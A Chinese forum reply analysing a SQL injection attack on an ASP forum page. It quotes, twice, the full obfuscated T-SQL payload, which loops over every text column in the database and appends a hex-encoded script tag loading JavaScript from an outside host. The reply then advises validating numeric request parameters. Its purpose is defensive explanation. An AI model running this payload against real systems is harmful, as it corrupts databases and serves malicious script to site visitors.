解析后的代码为:dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=['+@c+']+ cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F312E636F6F6C302E62697A2F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;你拷贝到查询分析器看一下,并把cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F312E636F6F6C302E62697A2F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') 这段代码PRINT出来后,发现上面是一段JS代码.
针对你这个具体的问题act/forum/showtopic.asp page=1你这个asp里,好好验证下参数,比如request("page")如果不是数字就提示错误。
应该是:例如
针对你这个具体的问题 showtopic.asp page=1&topic_id=28970&forum_id=6';dEcLaRe%。。你这个asp里,好好验证下参数,比如request("forum_id")如果不是数字就提示错误。
dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b
wHeRe a.iD=b.iD AnD a.xTyPe='u'
AnD (b.xTyPe=99
oR b.xTyPe=35
oR b.xTyPe=231
oR b.xTyPe=167)
oPeN tAbLe_cursoR
fEtCh next
FrOm tAbLe_cursoR iNtO @t,@c
while(@@fEtCh_status=0) bEgIn
exec('UpDaTe ['+@t+']
sEt ['+@c+']=['+@c+']+
cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F312E636F6F6C302E62697A2F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))')
fEtCh next
FrOm tAbLe_cursoR
iNtO @t,@c
eNd cLoSe tAbLe_cursoR
dEAlLoCaTe tAbLe_cursoR;你拷贝到查询分析器看一下,并把cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F312E636F6F6C302E62697A2F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') 这段代码PRINT出来后,发现上面是一段JS代码.